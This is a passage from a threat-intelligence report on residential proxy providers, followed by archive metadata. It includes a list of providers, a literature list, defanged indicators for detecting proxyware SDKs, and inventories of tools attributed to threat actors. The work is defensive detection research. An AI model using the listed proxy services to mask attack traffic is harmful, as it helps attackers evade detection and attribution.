unstructured elements of a well-established cybercrime chain, meaning that dismantling them alone does little to combat criminal activities\r\noverall.\r\nFrom our observations, RESIP providers openly promote their offerings and advertise key features on well-established forums, and usually redirect customers to dedicated websites hosted on the Clear Web for purchase.\r\nWe are not able to ascertain whether the operators are exclusively focusing on RESIP-related activities or well-established cybercrime-related actors also operating in other areas.\r\nOur analysis suggests a notable proliferation of greyhat RESIP services particularly among advanced intrusion\r\nsets. In contrast to the reliance of less advanced actors on commercial VPNs, which are easier to detect, the\r\nincreasing RESIP adoption makes it difficult to differentiate connections from legitimate sources and those\r\noriginating from malicious actors. Consequently, detection and attribution are increasingly challenging.\r\nOur assumption is that RESIP services will be increasingly exploited by malicious actors in the next few years.\r\nWhile such services are documented as being most used by advanced groups, it is highly likely that they will be\r\nshortly adopted by a wider threat ecosystem.\r\nAbout Orange Cyberdefense World Watch team\r\nWorld Watch service works on behalf of our customers to collect, analyse, prioritise, contextualise and summarise\r\nthe essential threat and vulnerability data customers need to make informed decisions. The team, composed of\r\nsenior CTI analysts, takes in a continuous stream of data from a variety of open, commercial and proprietary data\r\nsources. The streams are manually triaged and distributed to provide the essential threat and vulnerability\r\nintelligence our customers need to make good decisions, whilst filtering out fear, uncertainty and doubt (FUD) and\r\nother hyperbole that can distract and disorient security operations teams.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 19 of 28\n\nAbout Sekoia.io TDR team\r\nTDR is the Sekoia Threat Detection \u0026 Research team. Created in 2020, TDR provides exclusive Threat\r\nIntelligence, including fresh and contextualised IOCs and threat reports for the Sekoia SOC Platform. TDR is\r\nalso responsible for producing detection materials through a built-in Sigma, Sigma Correlation and Anomaly rules\r\ncatalogue.\r\nTDR is a team of multidisciplinary and passionate cybersecurity experts, including security researchers, detection\r\nengineers, reverse engineers, and technical and strategic threat intelligence analysts.\r\nThreat Intelligence analysts and researchers are looking at state-sponsored \u0026 cybercrime threats from a strategic\r\nto a technical perspective to track, hunt and detect adversaries. Detection engineers focus oncreating and\r\nmaintaining high-quality detection rules to detect the TTPs most widely exploited by adversaries.\r\nYou can also find this blogpost on Sekoia.io's website: https://blog.sekoia.io/unveiling-the-depths-of-residential-proxies-providers/\"\r\nAppendixes\r\nAppendix A: Sample of RESIP providers analysed \r\n922 Proxy                                        LocalProxies                                        ProxyWave Shop\r\n9Proxy                                             Lopata Proxy                                       ProxyWRLD\r\nABC Proxy                                       LTE Boost                                           PythaProxy\r\nAceProxies                                      LumiProxy                                           RAINPROXY LLC\r\nAsocks                                             LunaProxy                                          ResidentialProxy.Online\r\nBlackStore                                       MangoProxy                                       Shifter\r\nCloudRouter                                    MountProxies                                     Smart Proxy\r\nDCPROXY                                      NightProxy                                          SOCKS CAT\r\nDigiproxy.cc                                    OkayVPN                                            Spyder Proxy\r\nGokturkhost                                    Omega Proxy                                      Storm Proxies\r\nGSproxy                                          PIA S5 Proxy                                      ThunderProxy\r\nHomeIP                                           PingProxies                                        TrackProxies\r\nIntenseProxy                                   PROXIES.FO                                     UniProxy\r\nIPCola                                             Proxiware                                           VALORANT / LoL\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 20 of 28\n\nLeastslow                                        Proxy Sale                                         We1.Town\r\nLightning Proxies                            PROXY SOXY                                   yilu.us\r\nLIL Proxy                                        ProxyHub\r\nAppendix B: Literature on suspicious RESIP (non exhaustive)\r\nCloudRouter / 911\r\nCloudRouter: 911 Proxy Resurrected (Spur, February 2024)\r\nUnnamed proxy service\r\nMidnight Blizzard: Guidance for responders on nation-state attack (Microsoft, January 2024)\r\nRayobyte / FineProxy\r\nMajor Proxy Providers Implicated in digital attack on Philippine Media Giant Rappler (Qurium, December 2023)\r\nBoostyProxy\r\nUnveiling Socks5Systemz: The Rise of a New Proxy Service via PrivateLoader and Amadey (BitSight, November\r\n2023)\r\nWhiteProxies\r\nDDoS attacks against Hungarian media traced to proxy infrastructure “WhiteProxies”  (Qurium, November 2023)\r\nProxx.io/net\r\nRussian and Moldovan National Pleads Guilty to Operating Illegal Botnet Proxy Service that Infected Tens of\r\nThousands of Internet-Connected Devices Around the World (United States Department of Justice, November\r\n2023)\r\nDoveIP / Bullet proxy\r\nTrojans All the Way Down: BADBOX and PEACHPIT (HUMAN Security, October 2023)\r\nA Closer Exploration of Residential Proxies and CAPTCHA-Breaking Services (Trend Micro, July 2023)\r\nNimbleway\r\nBrianKrebs on infosec.exchange (Brian Krebs, August 2023) \r\nProxyNation/DigitalPulseData\r\nProxyNation: The dark nexus between proxy apps and malware (AT\u0026T Alien Labs, August 2023)\r\nSocksEscort\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 21 of 28\n\nChristmas in July: A Finely Wrapped Malware Proxy Service (Spur, July 2023)\r\nUnnamed proxy service\r\nRouters From The Underground: Exposing AVrecon (Lumen, July 2023)\r\nNexusnet / EliteProxy.net / Proxysell.com / asocks.com\r\nIntegral Ad Science Uncovered A Malicious VPN App With Over One Million Downloads (B\u0026T, May 2023)\r\nTECHNICAL DISCLOSURE: OKO VPN (IAS Threat Lab, May 2023)\r\nIdentifying the Nexus of Scaled Ad Fraud (Spur, May 2023)\r\nBHproxies\r\nMylobot: Investigating a proxy botnet (BitSight, February 2023)\r\nUnnamed proxy service\r\nOwner of an Android TV box? May want to check if it's an active botnet member... (DesktopECHO, November\r\n2022)\r\nMicroleaves/Shifter.io\r\nBreach Exposes Users of Microleaves Proxy Service (KrebsOnSecurity, July 2022)\r\n911.re / VIP72 / LuxSocks\r\n911 Proxy Service Implodes After Disclosing Breach (KrebsOnSecurity, July 2022)\r\nRSOCKS\r\nMeet the Administrators of the RSOCKS Proxy Botnet (KrebsOnSecurity, June 2022)\r\nAWM proxy (proxs.ru)\r\nThe Link Between AWM Proxy \u0026 the Glupteba Botnet (KrebsOnSecurity, June 2022)\r\nUnnamed proxy service\r\nAnatomy of an Android Malware Dropper (EFF Threat Lab, April 2022)\r\nHoneyGain/Peer2Profit\r\nAttracting flies with Honey(gain): Adversarial abuse of proxyware (Talos, August 2021)\r\nVIP72\r\n15-Year-Old Malware Proxy Network VIP72 Goes Dark (KrebsOnSecurity, July 2021)\r\nFree-socks.in \r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 22 of 28\n\nAn Analysis of Linux.Ngioweb Botnet (NetLab, June 2019)\r\nAppendix C: Hunting leads (non exhaustive)\r\nProxywares are not inherently malicious and generally do not pose an immediate security risk to the devices on\r\nwhich they are installed. However, their presence on corporate devices is likely to violate the IT policies of most\r\norganisations. The indicators listed below, which are associated with some of the most well-known proxywares,\r\ndo not constitute an exhaustive list but provide a starting point for assessing the prevalence of this type of software\r\nwithin a network.\r\nBright SDK\r\nThe Bright Data (formerly Luminati) SDK allows developers to incorporate proxyware functionality into their\r\napplications. Upon installation, users are given the choice to opt in to premium features in exchange for the use of\r\ntheir internet connection. Developers receive compensation proportional to the amount of the user's internet\r\nconnection utilised.\r\n3.228.177[.]90 IP address\r\n3.228.36[.]186 IP address\r\nclientsdk.brdtnet[.]com domain name\r\nclientsdk.bright-sdk[.]com domain name\r\nclientsdk.lum-sdk[.]io domain name\r\nclientsdk.luminati-china[.]io domain name\r\nclientsdk.luminati[.]io domain name\r\nclientsdk.luminatinet[.]com domain name\r\nlum_sdk.dll file name\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 23 of 28\n\nlum_sdk32.dll file name\r\nlum_sdk64.dll file name\r\nlum_sdk64_clr.dll file name\r\nlum_sdk32.lib file name\r\nlum_sdk64.lib file name\r\nnet_updater.exe file name\r\nnet_updater32.exe file name\r\nnet_updater64.exe file name\r\nEarnApp\r\nEarnApp is a proxyware affiliated with Bright Data that offers users to earn money in exchange for the use of their\r\ninternet connection.\r\n34.237.199[.]147 IP address\r\nclient.earnapp[.]com domain name\r\nearnapp.exe file name\r\nearnapp file name\r\nHola VPN\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 24 of 28\n\nHola is a free VPN product affiliated with Bright Data which allows free access in return for utilising users'\r\ninternet connection. It is most commonly installed as a web browser extension.\r\n54.225.227[.]202 IP address\r\n54.243.128[.]120 IP address\r\nclient.holavpnextension[.]com domain name\r\nclient.holavpn[.]net domain name\r\nclient.c6gj-static[.]net domain name\r\nclient.zspeed-cdn[.]com domain name\r\nclient.su89-cdn[.]net domain name\r\nclient.h-vpn[.]org domain name\r\nclient.holax[.]io domain name\r\nclient.holafreevpn[.]com domain name\r\nclient.hola-vpn[.]com domain name\r\nclient.shoopit[.]com domain name\r\nclient.holavpnworld[.]com domain name\r\nclient.holavpnrussia[.]com domain name\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 25 of 28\n\nclient.hola[.]org domain name\r\nclient.holabrowser[.]com domain name\r\nclient.holavpninstaller[.]com domain name\r\nclient.haffnetworkam[.]com domain name\r\nclient.haffnetworkmm[.]com domain name\r\nclient.yd6n63ptky[.]com domain name\r\nclient.holavpnandroid[.]com domain name\r\nInfatica SDK\r\nInfatica SDK allows developers to incorporate proxyware functionality into their applications, and to receive\r\ncompensation when the user's internet connection is utilised.\r\n185.223.94[.]16:8886 IP address\r\n103.chtsite[.]com domain name\r\ninfatica-service-app[.]exe file name\r\ninfatica-service.dll file name\r\nHoneygain\r\nHoneygain is a proxyware affiliated with Oxylabs that offers users to earn money in exchange for the use of their\r\ninternet connection.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 26 of 28\n\napi.honeygain[.]com domain name\r\nHoneygain.exe file name\r\nHoneygainUpdater.exe file name\r\nhoneygain file name\r\nPeer2Profit\r\nPeer2Profit is a proxyware that offers users to earn money in exchange for the use of their internet connection.\r\n178.32.99[.]172 IP address\r\napi.peer2profit[.]global domain name\r\nupdates.peer2profit[.]app domain name\r\nPeer2Profit.exe file name\r\npeer2profit file name\r\nIPRoyal and Pawns.app\r\nPawns.app is a proxyware affiliated with IPRoyal that offers users to earn money in exchange for the use of their\r\ninternet connection.\r\n93.189.62[.]83 IP address\r\n2a06:f902:a:1f:0:0:0[:]2 IP address\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 27 of 28\n\napi.iproyal[.]com domain name\r\nipv6-api.iproyal[.]com domain name\r\napi.pawns[.]app domain name\r\nipv6-api.pawns[.]app domain name\r\nresi-api.pawns[.]app domain name\r\nresi6-api.pawns[.]app domain name\r\nPawns.app.exe file name\r\npawns-cli file name\r\nlibpawns file name\r\nlibpawns.dll file name\r\nlibpawns.dylib file name\r\nlibpawns32.dll file name\r\nSource: https://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 28 of 28", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.orangecyberdefense.com/global/blog/research/residential-proxies" ], "report_names": [ "residential-proxies" ], "threat_actors": [ { "id": "9ddc7baf-2ea7-4294-af2c-5fce1021e8e8", "created_at": "2023-06-23T02:04:34.386651Z", "updated_at": "2026-04-10T02:00:04.772256Z", "deleted_at": null, "main_name": "Muddled Libra", "aliases": [ "0ktapus", "Scatter Swine", "Scattered Spider" ], "source_name": "ETDA:Muddled Libra", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "7da6012f-680b-48fb-80c4-1b8cf82efb9c", "created_at": "2023-11-01T02:01:06.643737Z", "updated_at": "2026-04-10T02:00:05.340198Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "Scattered Spider", "Roasted 0ktapus", "Octo Tempest", "Storm-0875", "UNC3944" ], "source_name": "MITRE:Scattered Spider", "tools": [ "WarzoneRAT", "Rclone", "LaZagne", "Mimikatz", "Raccoon Stealer", "ngrok", "BlackCat", "ConnectWise" ], "source_id": "MITRE", "reports": null }, { "id": "c3b908de-3dd1-4e5d-ba24-5af8217371f0", "created_at": "2023-10-03T02:00:08.510742Z", "updated_at": "2026-04-10T02:00:03.374705Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "UNC3944", "Scattered Swine", "Octo Tempest", "DEV-0971", "Starfraud", "Muddled Libra", "Oktapus", "Scatter Swine", "0ktapus", "Storm-0971" ], "source_name": "MISPGALAXY:Scattered Spider", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "d093e8d9-b093-47b8-a988-2a5cbf3ccec9", "created_at": "2023-10-14T02:03:13.99057Z", "updated_at": "2026-04-10T02:00:04.531987Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "0ktapus", "LUCR-3", "Muddled Libra", "Octo Tempest", "Scatter Swine", "Scattered Spider", "Star Fraud", "Storm-0875", "UNC3944" ], "source_name": "ETDA:Scattered Spider", "tools": [ "ADRecon", "AnyDesk", "ConnectWise", "DCSync", "FiveTran", "FleetDeck", "Govmomi", "Hekatomb", "Impacket", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "Lumma Stealer", "LummaC2", "Mimikatz", "Ngrok", "PingCastle", "ProcDump", "PsExec", "Pulseway", "Pure Storage FlashArray", "Pure Storage FlashArray PowerShell SDK", "RedLine Stealer", "Rsocx", "RustDesk", "ScreenConnect", "SharpHound", "Socat", "Spidey Bot", "Splashtop", "Stealc", "TacticalRMM", "Tailscale", "TightVNC", "VIDAR", "Vidar Stealer", "WinRAR", "WsTunnel", "gosecretsdump" ], "source_id": "ETDA", "reports": null }, { "id": "e424a2db-0f5a-4ee5-96d2-5ab16f1f3824", "created_at": "2024-06-19T02:03:08.062614Z", "updated_at": "2026-04-10T02:00:03.655475Z", "deleted_at": null, "main_name": "GOLD HARVEST", "aliases": [ "Octo Tempest ", "Roasted 0ktapus ", "Scatter Swine ", "Scattered Spider ", "UNC3944 " ], "source_name": "Secureworks:GOLD HARVEST", "tools": [ "AnyDesk", "ConnectWise Control", "Logmein" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434443, "ts_updated_at": 1775792252, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c7349c7f4f8237977d2e2d9fcbcc1fef2f429afe.pdf", "text": "https://archive.orkl.eu/c7349c7f4f8237977d2e2d9fcbcc1fef2f429afe.txt", "img": "https://archive.orkl.eu/c7349c7f4f8237977d2e2d9fcbcc1fef2f429afe.jpg" } }